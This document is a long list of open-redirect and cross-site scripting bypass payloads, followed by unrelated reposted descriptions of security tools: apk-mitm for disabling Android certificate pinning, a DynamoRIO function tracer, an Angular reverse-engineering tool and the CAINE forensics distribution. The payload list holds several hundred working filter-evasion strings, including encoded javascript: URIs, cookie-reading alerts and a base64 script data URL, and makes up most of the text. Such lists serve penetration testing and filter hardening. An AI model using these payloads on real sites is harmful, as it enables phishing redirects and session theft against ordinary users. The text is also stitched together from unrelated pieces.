/?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com
/\/\/example.com/
/\/example.com/
/example.com/%2f%2e%2e
/http://%67%6f%6f%67%6c%65%2e%63%6f%6d
/http://example.com
/http:/example.com
/https:/%5cexample.com/
/https://%09/example.com
/https://%5cexample.com
/https:///example.com/%2e%2e
/https:///example.com/%2f%2e%2e
/https://example.com
/https://example.com/
/https://example.com/%2e%2e
/https://example.com/%2e%2e%2f
/https://example.com/%2f%2e%2e
/https://example.com/%2f..
/https://example.com//
/https:example.com
/redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com
/redirect?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redir=/\/example.com&rurl=/\/example.com&redirect_uri=/\/example.com
/redirect?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com

//%2fxgoogle.com
/ReceiveAutoRedirect/false?desiredLocationUrl=http://xssposed.org
//localdomain.pw/%2f..
//www.whitelisteddomain.tld@localdomain.pw/%2f..
///localdomain.pw/%2f..
///www.whitelisteddomain.tld@localdomain.pw/%2f..
////localdomain.pw/%2f..
////www.whitelisteddomain.tld@localdomain.pw/%2f..
https://localdomain.pw/%2f..
https://www.whitelisteddomain.tld@localdomain.pw/%2f..
/https://localdomain.pw/%2f..
/https://www.whitelisteddomain.tld@localdomain.pw/%2f..
//localdomain.pw/%2f%2e%2e
//www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
///localdomain.pw/%2f%2e%2e
///www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
////localdomain.pw/%2f%2e%2e
////www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
https://localdomain.pw/%2f%2e%2e
https://www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
/https://localdomain.pw/%2f%2e%2e
/https://www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
//localdomain.pw/
//www.whitelisteddomain.tld@localdomain.pw/
///localdomain.pw/
///www.whitelisteddomain.tld@localdomain.pw/
////localdomain.pw/
////www.whitelisteddomain.tld@localdomain.pw/
https://localdomain.pw/
https://www.whitelisteddomain.tld@localdomain.pw/
/https://localdomain.pw/
/https://www.whitelisteddomain.tld@localdomain.pw/
//localdomain.pw//
//www.whitelisteddomain.tld@localdomain.pw//
///localdomain.pw//
///www.whitelisteddomain.tld@localdomain.pw//
////localdomain.pw//
////www.whitelisteddomain.tld@localdomain.pw//
https://localdomain.pw//
https://www.whitelisteddomain.tld@localdomain.pw//
//https://localdomain.pw//
//https://www.whitelisteddomain.tld@localdomain.pw//
//localdomain.pw/%2e%2e%2f
//www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f
///localdomain.pw/%2e%2e%2f
///www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f
////localdomain.pw/%2e%2e%2f
////www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f
https://localdomain.pw/%2e%2e%2f
https://www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f
//https://localdomain.pw/%2e%2e%2f
//https://www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f
///localdomain.pw/%2e%2e
///www.whitelisteddomain.tld@localdomain.pw/%2e%2e
////localdomain.pw/%2e%2e
////www.whitelisteddomain.tld@localdomain.pw/%2e%2e
https:///localdomain.pw/%2e%2e
https:///www.whitelisteddomain.tld@localdomain.pw/%2e%2e
//https:///localdomain.pw/%2e%2e
//www.whitelisteddomain.tld@https:///localdomain.pw/%2e%2e
/https://localdomain.pw/%2e%2e
/https://www.whitelisteddomain.tld@localdomain.pw/%2e%2e
///localdomain.pw/%2f%2e%2e
///www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
////localdomain.pw/%2f%2e%2e
////www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
https:///localdomain.pw/%2f%2e%2e
https:///www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
/https://localdomain.pw/%2f%2e%2e
/https://www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
/https:///localdomain.pw/%2f%2e%2e
/https:///www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
/%09/localdomain.pw
/%09/www.whitelisteddomain.tld@localdomain.pw
//%09/localdomain.pw
//%09/www.whitelisteddomain.tld@localdomain.pw
///%09/localdomain.pw
///%09/www.whitelisteddomain.tld@localdomain.pw
////%09/localdomain.pw
////%09/www.whitelisteddomain.tld@localdomain.pw
https://%09/localdomain.pw
https://%09/www.whitelisteddomain.tld@localdomain.pw
/%5clocaldomain.pw
/%5cwww.whitelisteddomain.tld@localdomain.pw
//%5clocaldomain.pw
//%5cwww.whitelisteddomain.tld@localdomain.pw
///%5clocaldomain.pw
///%5cwww.whitelisteddomain.tld@localdomain.pw
////%5clocaldomain.pw
////%5cwww.whitelisteddomain.tld@localdomain.pw
https://%5clocaldomain.pw
https://%5cwww.whitelisteddomain.tld@localdomain.pw
/https://%5clocaldomain.pw
/https://%5cwww.whitelisteddomain.tld@localdomain.pw
https://localdomain.pw
https://www.whitelisteddomain.tld@localdomain.pw
javascript:alert(1);
javascript:alert(1)
//javascript:alert(1);
/javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1)
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%09/javascript:alert(1);
/%09/javascript:alert(1)
java%0d%0ascript%0d%0a:alert(0)
//localdomain.pw
https:localdomain.pw
//localdomain%E3%80%82pw
\/\/localdomain.pw/
/\/localdomain.pw/
/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/
//localdomain.pw
https://www.whitelisteddomain.tld/https://localdomain.pw/
";alert(0);//
javascript://www.whitelisteddomain.tld?%a0alert%281%29
http://0xd8.0x3a.0xd6.0xce
http://www.whitelisteddomain.tld@0xd8.0x3a.0xd6.0xce
http://3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
http://XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http://0xd83ad6ce
http://www.whitelisteddomain.tld@0xd83ad6ce
http://3H6k7lIAiqjfNeN@0xd83ad6ce
http://XY>.7d8T\205pZM@0xd83ad6ce
http://3627734734
http://www.whitelisteddomain.tld@3627734734
http://3H6k7lIAiqjfNeN@3627734734
http://XY>.7d8T\205pZM@3627734734
http://472.314.470.462
http://www.whitelisteddomain.tld@472.314.470.462
http://3H6k7lIAiqjfNeN@472.314.470.462
http://XY>.7d8T\205pZM@472.314.470.462
http://0330.072.0326.0316
http://www.whitelisteddomain.tld@0330.072.0326.0316
http://3H6k7lIAiqjfNeN@0330.072.0326.0316
http://XY>.7d8T\205pZM@0330.072.0326.0316
http://00330.00072.0000326.00000316
http://www.whitelisteddomain.tld@00330.00072.0000326.00000316
http://3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http://XY>.7d8T\205pZM@00330.00072.0000326.00000316
http://[::216.58.214.206]
http://www.whitelisteddomain.tld@[::216.58.214.206]
http://3H6k7lIAiqjfNeN@[::216.58.214.206]
http://XY>.7d8T\205pZM@[::216.58.214.206]
http://[::ffff:216.58.214.206]
http://www.whitelisteddomain.tld@[::ffff:216.58.214.206]
http://3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http://XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http://0xd8.072.54990
http://www.whitelisteddomain.tld@0xd8.072.54990
http://3H6k7lIAiqjfNeN@0xd8.072.54990
http://XY>.7d8T\205pZM@0xd8.072.54990
http://0xd8.3856078
http://www.whitelisteddomain.tld@0xd8.3856078
http://3H6k7lIAiqjfNeN@0xd8.3856078
http://XY>.7d8T\205pZM@0xd8.3856078
http://00330.3856078
http://www.whitelisteddomain.tld@00330.3856078
http://3H6k7lIAiqjfNeN@00330.3856078
http://XY>.7d8T\205pZM@00330.3856078
http://00330.0x3a.54990
http://www.whitelisteddomain.tld@00330.0x3a.54990
http://3H6k7lIAiqjfNeN@00330.0x3a.54990
http://XY>.7d8T\205pZM@00330.0x3a.54990
http:0xd8.0x3a.0xd6.0xce
http:www.whitelisteddomain.tld@0xd8.0x3a.0xd6.0xce
http:3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
http:XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http:0xd83ad6ce
http:www.whitelisteddomain.tld@0xd83ad6ce
http:3H6k7lIAiqjfNeN@0xd83ad6ce
http:XY>.7d8T\205pZM@0xd83ad6ce
http:3627734734
http:www.whitelisteddomain.tld@3627734734
http:3H6k7lIAiqjfNeN@3627734734
http:XY>.7d8T\205pZM@3627734734
http:472.314.470.462
http:www.whitelisteddomain.tld@472.314.470.462
http:3H6k7lIAiqjfNeN@472.314.470.462
http:XY>.7d8T\205pZM@472.314.470.462
http:0330.072.0326.0316
http:www.whitelisteddomain.tld@0330.072.0326.0316
http:3H6k7lIAiqjfNeN@0330.072.0326.0316
http:XY>.7d8T\205pZM@0330.072.0326.0316
http:00330.00072.0000326.00000316
http:www.whitelisteddomain.tld@00330.00072.0000326.00000316
http:3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http:XY>.7d8T\205pZM@00330.00072.0000326.00000316
http:[::216.58.214.206]
http:www.whitelisteddomain.tld@[::216.58.214.206]
http:3H6k7lIAiqjfNeN@[::216.58.214.206]
http:XY>.7d8T\205pZM@[::216.58.214.206]
http:[::ffff:216.58.214.206]
http:www.whitelisteddomain.tld@[::ffff:216.58.214.206]
http:3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http:XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http:0xd8.072.54990
http:www.whitelisteddomain.tld@0xd8.072.54990
http:3H6k7lIAiqjfNeN@0xd8.072.54990
http:XY>.7d8T\205pZM@0xd8.072.54990
http:0xd8.3856078
http:www.whitelisteddomain.tld@0xd8.3856078
http:3H6k7lIAiqjfNeN@0xd8.3856078
http:XY>.7d8T\205pZM@0xd8.3856078
http:00330.3856078
http:www.whitelisteddomain.tld@00330.3856078
http:3H6k7lIAiqjfNeN@00330.3856078
http:XY>.7d8T\205pZM@00330.3856078
http:00330.0x3a.54990
http:www.whitelisteddomain.tld@00330.0x3a.54990
http:3H6k7lIAiqjfNeN@00330.0x3a.54990
http:XY>.7d8T\205pZM@00330.0x3a.54990
〱localdomain.pw
〵localdomain.pw
ゝlocaldomain.pw
ーlocaldomain.pw
ーlocaldomain.pw
/〱localdomain.pw
/〵localdomain.pw
/ゝlocaldomain.pw
/ーlocaldomain.pw
/ーlocaldomain.pw
%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
http://%67%6f%6f%67%6c%65%2e%63%6f%6d
<>javascript:alert(1);
<>//localdomain.pw
//localdomain.pw\@www.whitelisteddomain.tld
https://:@localdomain.pw\@www.whitelisteddomain.tld
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
ja\nva\tscript\r:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
\152\141\166\141\163\143\162\151\160\164\072alert(1)
http://localdomain.pw:80#@www.whitelisteddomain.tld/
http://localdomain.pw:80?@www.whitelisteddomain.tld/
http://3H6k7lIAiqjfNeN@www.whitelisteddomain.tld+@localdomain.pw/
http://XY>.7d8T\205pZM@www.whitelisteddomain.tld+@localdomain.pw/
http://3H6k7lIAiqjfNeN@www.whitelisteddomain.tld@localdomain.pw/
http://XY>.7d8T\205pZM@www.whitelisteddomain.tld@localdomain.pw/
http://www.whitelisteddomain.tld+&@localdomain.pw#+@www.whitelisteddomain.tld/
http://localdomain.pw\twww.whitelisteddomain.tld/
//localdomain.pw:80#@www.whitelisteddomain.tld/
//localdomain.pw:80?@www.whitelisteddomain.tld/
//3H6k7lIAiqjfNeN@www.whitelisteddomain.tld+@localdomain.pw/
//XY>.7d8T\205pZM@www.whitelisteddomain.tld+@localdomain.pw/
//3H6k7lIAiqjfNeN@www.whitelisteddomain.tld@localdomain.pw/
//XY>.7d8T\205pZM@www.whitelisteddomain.tld@localdomain.pw/
//www.whitelisteddomain.tld+&@localdomain.pw#+@www.whitelisteddomain.tld/
//localdomain.pw\twww.whitelisteddomain.tld/
//;@localdomain.pw
http://;@localdomain.pw
@localdomain.pw
javascript://https://www.whitelisteddomain.tld/?z=%0Aalert(1)
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=
http://localdomain.pw%2f%2f.www.whitelisteddomain.tld/
http://localdomain.pw%5c%5c.www.whitelisteddomain.tld/
http://localdomain.pw%3F.www.whitelisteddomain.tld/
http://localdomain.pw%23.www.whitelisteddomain.tld/
http://www.whitelisteddomain.tld:80%40localdomain.pw/
http://www.whitelisteddomain.tld%2elocaldomain.pw/
/x:1/:///%01javascript:alert(document.cookie)/
/https:/%5clocaldomain.pw/
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
/http://localdomain.pw
/%2f%2flocaldomain.pw
/localdomain.pw/%2f%2e%2e
/http:/localdomain.pw
/.localdomain.pw
http://.localdomain.pw
.localdomain.pw
///\;@localdomain.pw
///localdomain.pw
/////localdomain.pw/
/////localdomain.pw
java%0ascript:alert(1)
java%09script:alert(1)
java%0dscript:alert(1)
javascript://%0aalert(1)
Javas%26%2399;ript:alert(1)
data:www.whitelisteddomain.tld;text/html;charset=UTF-8,<html><script>document.write(document.domain);</script><iframe/src=xxxxx>aaaa</iframe></html>
jaVAscript://www.whitelisteddomain.tld//%0d%0aalert(1);//
http://www.localdomain.pw\.www.whitelisteddomain.tld
%19Jav%09asc%09ript:https%20://www.whitelisteddomain.tld/%250Aconfirm%25281%2529
//example.com@google.com/%2f..
///google.com/%2f..
///example.com@google.com/%2f..
////google.com/%2f..
////example.com@google.com/%2f..
https://google.com/%2f..
https://example.com@google.com/%2f..
/https://google.com/%2f..
/https://example.com@google.com/%2f..
//google.com/%2f%2e%2e
//example.com@google.com/%2f%2e%2e
///google.com/%2f%2e%2e
///example.com@google.com/%2f%2e%2e
////google.com/%2f%2e%2e
////example.com@google.com/%2f%2e%2e
https://google.com/%2f%2e%2e
https://example.com@google.com/%2f%2e%2e
/https://google.com/%2f%2e%2e
/https://example.com@google.com/%2f%2e%2e
//google.com/
//example.com@google.com/
///google.com/
///example.com@google.com/
////google.com/
////example.com@google.com/
https://google.com/
https://example.com@google.com/
/https://google.com/
/https://example.com@google.com/
//google.com//
//example.com@google.com//
///google.com//
///example.com@google.com//
////google.com//
////example.com@google.com//
https://google.com//
https://example.com@google.com//
//https://google.com//
//https://example.com@google.com//
//google.com/%2e%2e%2f
//example.com@google.com/%2e%2e%2f
///google.com/%2e%2e%2f
///example.com@google.com/%2e%2e%2f
////google.com/%2e%2e%2f
////example.com@google.com/%2e%2e%2f
https://google.com/%2e%2e%2f
https://example.com@google.com/%2e%2e%2f
//https://google.com/%2e%2e%2f
//https://example.com@google.com/%2e%2e%2f
///google.com/%2e%2e
///example.com@google.com/%2e%2e
////google.com/%2e%2e
////example.com@google.com/%2e%2e
https:///google.com/%2e%2e
https:///example.com@google.com/%2e%2e
//https:///google.com/%2e%2e
//example.com@https:///google.com/%2e%2e
/https://google.com/%2e%2e
/https://example.com@google.com/%2e%2e
///google.com/%2f%2e%2e
///example.com@google.com/%2f%2e%2e
////google.com/%2f%2e%2e
////example.com@google.com/%2f%2e%2e
https:///google.com/%2f%2e%2e
https:///example.com@google.com/%2f%2e%2e
/https://google.com/%2f%2e%2e
/https://example.com@google.com/%2f%2e%2e
/https:///google.com/%2f%2e%2e
/https:///example.com@google.com/%2f%2e%2e
/%09/google.com
/%09/example.com@google.com
//%09/google.com
//%09/example.com@google.com
///%09/google.com
///%09/example.com@google.com
////%09/google.com
////%09/example.com@google.com
https://%09/google.com
https://%09/example.com@google.com
/%5cgoogle.com
/%5cexample.com@google.com
//%5cgoogle.com
//%5cexample.com@google.com
///%5cgoogle.com
///%5cexample.com@google.com
////%5cgoogle.com
////%5cexample.com@google.com
https://%5cgoogle.com
https://%5cexample.com@google.com
/https://%5cgoogle.com
/https://%5cexample.com@google.com
https://google.com
https://example.com@google.com
javascript:alert(1);
javascript:alert(1)
//javascript:alert(1);
/javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1)
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%09/javascript:alert(1);
/%09/javascript:alert(1)
java%0d%0ascript%0d%0a:alert(0)
//google.com
https:google.com
//google%E3%80%82com
\/\/google.com/
/\/google.com/
//google.com
https://example.com/https://google.com/
";alert(0);//
javascript://example.com?%a0alert%281%29
http://0xd8.0x3a.0xd6.0xce
http://example.com@0xd8.0x3a.0xd6.0xce
http://3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
http://XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http://0xd83ad6ce
http://example.com@0xd83ad6ce
http://3H6k7lIAiqjfNeN@0xd83ad6ce
http://XY>.7d8T\205pZM@0xd83ad6ce
http://3627734734
http://example.com@3627734734
http://3H6k7lIAiqjfNeN@3627734734
http://XY>.7d8T\205pZM@3627734734
http://472.314.470.462
http://example.com@472.314.470.462
http://3H6k7lIAiqjfNeN@472.314.470.462
http://XY>.7d8T\205pZM@472.314.470.462
http://0330.072.0326.0316
http://example.com@0330.072.0326.0316
http://3H6k7lIAiqjfNeN@0330.072.0326.0316
http://XY>.7d8T\205pZM@0330.072.0326.0316
http://00330.00072.0000326.00000316
http://example.com@00330.00072.0000326.00000316
http://3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http://XY>.7d8T\205pZM@00330.00072.0000326.00000316
http://[::216.58.214.206]
http://example.com@[::216.58.214.206]
http://3H6k7lIAiqjfNeN@[::216.58.214.206]
http://XY>.7d8T\205pZM@[::216.58.214.206]
http://[::ffff:216.58.214.206]
http://example.com@[::ffff:216.58.214.206]
http://3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http://XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http://0xd8.072.54990
http://example.com@0xd8.072.54990
http://3H6k7lIAiqjfNeN@0xd8.072.54990
http://XY>.7d8T\205pZM@0xd8.072.54990
http://0xd8.3856078
http://example.com@0xd8.3856078
http://3H6k7lIAiqjfNeN@0xd8.3856078
http://XY>.7d8T\205pZM@0xd8.3856078
http://00330.3856078
http://example.com@00330.3856078
http://3H6k7lIAiqjfNeN@00330.3856078
http://XY>.7d8T\205pZM@00330.3856078
http://00330.0x3a.54990
http://example.com@00330.0x3a.54990
http://3H6k7lIAiqjfNeN@00330.0x3a.54990
http://XY>.7d8T\205pZM@00330.0x3a.54990
http:0xd8.0x3a.0xd6.0xce
http:example.com@0xd8.0x3a.0xd6.0xce
http:3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
http:XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http:0xd83ad6ce
http:example.com@0xd83ad6ce
http:3H6k7lIAiqjfNeN@0xd83ad6ce
http:XY>.7d8T\205pZM@0xd83ad6ce
http:3627734734
http:example.com@3627734734
http:3H6k7lIAiqjfNeN@3627734734
http:XY>.7d8T\205pZM@3627734734
http:472.314.470.462
http:example.com@472.314.470.462
http:3H6k7lIAiqjfNeN@472.314.470.462
http:XY>.7d8T\205pZM@472.314.470.462
http:0330.072.0326.0316
http:example.com@0330.072.0326.0316
http:3H6k7lIAiqjfNeN@0330.072.0326.0316
http:XY>.7d8T\205pZM@0330.072.0326.0316
http:00330.00072.0000326.00000316
http:example.com@00330.00072.0000326.00000316
http:3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http:XY>.7d8T\205pZM@00330.00072.0000326.00000316
http:[::216.58.214.206]
http:example.com@[::216.58.214.206]
http:3H6k7lIAiqjfNeN@[::216.58.214.206]
http:XY>.7d8T\205pZM@[::216.58.214.206]
http:[::ffff:216.58.214.206]
http:example.com@[::ffff:216.58.214.206]
http:3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http:XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http:0xd8.072.54990
http:example.com@0xd8.072.54990
http:3H6k7lIAiqjfNeN@0xd8.072.54990
http:XY>.7d8T\205pZM@0xd8.072.54990
http:0xd8.3856078
http:example.com@0xd8.3856078
http:3H6k7lIAiqjfNeN@0xd8.3856078
http:XY>.7d8T\205pZM@0xd8.3856078
http:00330.3856078
http:example.com@00330.3856078
http:3H6k7lIAiqjfNeN@00330.3856078
http:XY>.7d8T\205pZM@00330.3856078
http:00330.0x3a.54990
http:example.com@00330.0x3a.54990
http:3H6k7lIAiqjfNeN@00330.0x3a.54990
http:XY>.7d8T\205pZM@00330.0x3a.54990
〱google.com
〵google.com
ゝgoogle.com
ーgoogle.com
ーgoogle.com
/〱google.com
/〵google.com
/ゝgoogle.com
/ーgoogle.com
/ーgoogle.com
%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
http://%67%6f%6f%67%6c%65%2e%63%6f%6d
<>javascript:alert(1);
<>//google.com
//google.com\@example.com
https://:@google.com\@example.com
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
ja\nva\tscript\r:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
\152\141\166\141\163\143\162\151\160\164\072alert(1)
http://google.com:80#@example.com/
http://google.com:80?@example.com/
http://3H6k7lIAiqjfNeN@example.com+@google.com/
http://XY>.7d8T\205pZM@example.com+@google.com/
http://3H6k7lIAiqjfNeN@example.com@google.com/
http://XY>.7d8T\205pZM@example.com@google.com/
http://example.com+&@google.com#+@example.com/
http://google.com\texample.com/
//google.com:80#@example.com/
//google.com:80?@example.com/
//3H6k7lIAiqjfNeN@example.com+@google.com/
//XY>.7d8T\205pZM@example.com+@google.com/
//3H6k7lIAiqjfNeN@example.com@google.com/
//XY>.7d8T\205pZM@example.com@google.com/
//example.com+&@google.com#+@example.com/
//google.com\texample.com/
//;@google.com
http://;@google.com
@google.com
javascript://https://example.com/?z=%0Aalert(1)
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=
http://google.com%2f%2f.example.com/
http://google.com%5c%5c.example.com/
http://google.com%3F.example.com/
http://google.com%23.example.com/
http://example.com:80%40google.com/
http://example.com%2egoogle.com/
/x:1/:///%01javascript:alert(document.cookie)/
/https:/%5cgoogle.com/
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
/http://google.com
/%2f%2fgoogle.com
/google.com/%2f%2e%2e
/http:/google.com
/.google.com
///\;@google.com
///google.com
/////google.com/



Apk-Mitm - A CLI Application That Prepares Android APK Files For HTTPS Inspection


A CLI application that automatically prepares Android APK files for HTTPS inspection

Inspecting a mobile app's HTTPS traffic using a proxy is probably the easiest way to figure out how it works. However, with the Network Security Configuration introduced in Android 7 and app developers trying to prevent MITM attacks using certificate pinning, getting an app to work with an HTTPS proxy has become quite tedious.
apk-mitm automates the entire process. All you have to do is give it an APK file, and apk-mitm will decode it, modify the app's manifest and network security config, disable certificate pinning, and then re-encode and sign the patched APK (each of these steps is visible in the example output below).
You can also use apk-mitm to patch apps distributed as Android App Bundles, and rooting your phone is not required.

Usage
If you have an up-to-date version of Node.js (8.2+) and Java (8+), you can run this command to patch an app:
$ npx apk-mitm <path-to-apk>
So, if your APK file is called example.apk, you'd run:
$ npx apk-mitm example.apk

✔ Decoding APK file
✔ Modifying app manifest
✔ Modifying network security config
✔ Disabling certificate pinning
✔ Encoding patched APK file
✔ Signing patched APK file

Done! Patched APK: ./example-patched.apk
You can now install the example-patched.apk file on your Android device and use a proxy like Charles or mitmproxy to look at the app's traffic.

Patching App Bundles
You can also patch apps using Android App Bundle with apk-mitm by providing it with a *.xapk file (for example from APKPure) or a *.apks file (which you can export yourself using SAI).
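For example, assuming a bundle exported as example.xapk, the invocation is the same as for a plain APK file:
$ npx apk-mitm example.xapk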

Caveats
  • If the app uses Google Maps and the map is broken after patching, then the app's API key is probably restricted to the developer's certificate. You'll have to create your own API key without restrictions and replace it in the app's AndroidManifest.xml file.
  • If apk-mitm crashes while decoding or encoding, the issue is probably related to Apktool. Check their issues on GitHub to find possible workarounds. If you happen to find an Apktool version that's not affected by the issue, you can instruct apk-mitm to use it by specifying the path of its JAR file through the --apktool option.

Installation
The above example used npx to download and execute apk-mitm without local installation. If you do want to fully install it, you can do that by running:
$ npm install -g apk-mitm
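After a global installation, the command is available directly, without npx:
$ apk-mitm example.apk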



Functrace - A Function Tracer


functrace is a tool that helps to analyze a binary file with dynamic instrumentation using DynamoRIO (http://dynamorio.org/).
These are some implemented features (based on DynamoRIO):
  • disassemble all the executed code
  • disassemble a specific function (dump if these are addresses)
  • get arguments of a specific function (dump if these are addresses)
  • get return value of a specific function (dump if this is an address)
  • monitor application signals
  • generate a report file
  • Ghidra (https://ghidra-sre.org/) coverage script (based on the functrace report file)

Setup
$ wget https://github.com/DynamoRIO/dynamorio/releases/download/release_7_0_0_rc1/DynamoRIO-Linux-7.0.0-RC1.tar.gz
$ tar xvzf DynamoRIO-Linux-7.0.0-RC1.tar.gz
OR
$ wget https://github.com/DynamoRIO/dynamorio/releases/download/cronbuild-7.91.18047/DynamoRIO-x86_64-Linux-7.91.18047-0.tar.gz
$ tar xvzf DynamoRIO-x86_64-Linux-7.91.18047-0.tar.gz
You can also clone and compile DynamoRIO directly. Then build functrace:
$ git clone https://github.com/invictus1306/functrace
$ mkdir -p functrace/build
$ cd functrace/build
$ cmake .. -DDynamoRIO_DIR=/full_DR_path/cmake/
$ make -j4

Using functrace
$ drrun -c libfunctrace.so -report_file report -- target_program [args]

Options
The following functrace (https://github.com/invictus1306/functrace) options are supported:
-disassembly                  -> disassemble all the functions
-disas_func function_name     -> disassemble only the function function_name
-wrap_function function_name  -> wrap the function function_name
-wrap_function_args num_args  -> number of arguments of the wrapped function
-cbr                          -> remove the bb from the cache (in case of conditional jump)
-report_file file_name        -> report file name (required)
-verbose                      -> verbose

Simple usage

Option -verbose
$ drrun -c libfunctrace.so -report_file report -verbose -- target_program [args]

Option -disassembly
$ drrun -c libfunctrace.so -report_file report -disassembly -- target_program [args]

Option -disas_func
$ drrun -c libfunctrace.so -report_file report -disas_func name_function -- target_program [args]

Option -wrap_function and -wrap_function_args
$ drrun -c libfunctrace.so -report_file report -wrap_function name_function -wrap_function_args num_args -- target_program [args]

Option -cbr
$ drrun -c libfunctrace.so -report_file report -cbr -- target_program [args]

CVE-2018-4013 - Vulnerability Analysis
A vulnerability in the LIVE555 RTSP server library.


Working environment
Tested on Ubuntu 16.04.5 LTS 64 bit

Future features
  • Ghidra plugin
  • Visual setup interface
  • Store and compare different coverage analysis
  • Run DR directly from ghidra
  • Add more functionality to functrace
  • Support for Android


Ngrev - Tool For Reverse Engineering Of Angular Applications


Graphical tool for reverse engineering of Angular projects. It allows you to navigate in the structure of your application and observe the relationship between the different modules, providers, and directives. The tool performs static code analysis which means that you don't have to run your application in order to use it.

How to use?

macOS
  1. Go to the releases page.
  2. Download the latest *.dmg file.
  3. Install the application.

Linux
  1. Go to the releases page.
  2. Download the latest *.AppImage file.
  3. Run the *.AppImage file (you may need to chmod +x *.AppImage).

Windows
  1. Go to the releases page.
  2. Download the latest *.exe file.
  3. Install the application.

Creating a custom theme
You can add your own theme by creating a [theme-name].theme.json file in Electron[userData]/themes. For a sample theme see Dark.

Application Requirements
Your application needs to be compatible with Angular's AoT compiler (i.e., you should be able to compile it with ngc).

Using with Angular CLI
  1. Open the Angular application's directory.
  2. Make sure the dependencies are installed.
  3. Open ngrev.
  4. Click on Select Project and select [YOUR_CLI_APP]/src/tsconfig.app.json.

Using with Angular Seed
  1. Open the Angular application's directory.
  2. Make sure the dependencies are installed.
  3. Open ngrev.
  4. Click on Select Project and select [YOUR_CLI_APP]/src/client/tsconfig.json.

Demo
Demo here.






CAINE 11 - GNU/Linux Live Distribution For Digital Forensics Project, Windows Side Forensics And Incident Response


CAINE (Computer Aided INvestigative Environment) is an Italian GNU/Linux live distribution created as a Digital Forensics project. Currently, the project manager is Nanni Bassetti (Bari - Italy).
CAINE offers a complete forensic environment that is organized to integrate existing software tools as software modules and to provide a friendly graphical interface.

The main design objectives that CAINE aims to guarantee are the following:
  • an interoperable environment that supports the digital investigator during the four phases of the digital investigation
  • a user-friendly graphical interface
  • user-friendly tools
CAINE fully represents the spirit of the Open Source philosophy: the project is completely open, and anyone can take on the legacy of the previous developer or project manager. The distro is open source, the Windows side is freeware and, last but not least, the distro is installable, making it possible to rebuild it in a brand new version and thus giving this project a long life...


The important news is that CAINE 11.0 blocks all block devices (e.g. /dev/sda) in Read-Only mode by default. You can manage this with a GUI tool named BlockON/OFF, present on CAINE's Desktop.
This new write-blocking method ensures all disks are truly protected from accidental write operations, because they are locked in Read-Only mode.
If you need to write to a disk, you can unlock it with BlockOn/Off or by using "Mounter" and changing the policy to writable mode.
CAINE also boots faster than before, and CAINE 11.0 can boot to RAM (toram).

IMPORTANT CHANGES:
  • All devices are blocked in Read-Only mode, by default.
  • New tools, new OSINT, Autopsy 4.13 onboard, APFS ready, BTRFS forensic tool, NVME SSD drivers ready!
  • SSH server disabled by default (see Manual page for enabling it).
  • SCRCPY - mirror the screen of your Android device
  • Autopsy 4.13 + additional plugins by McKinnon.
  • X11VNC Server - to control CAINE remotely.
  • hashcat
  • NEW SCRIPTS (Forensics Tools - Analysis menu)
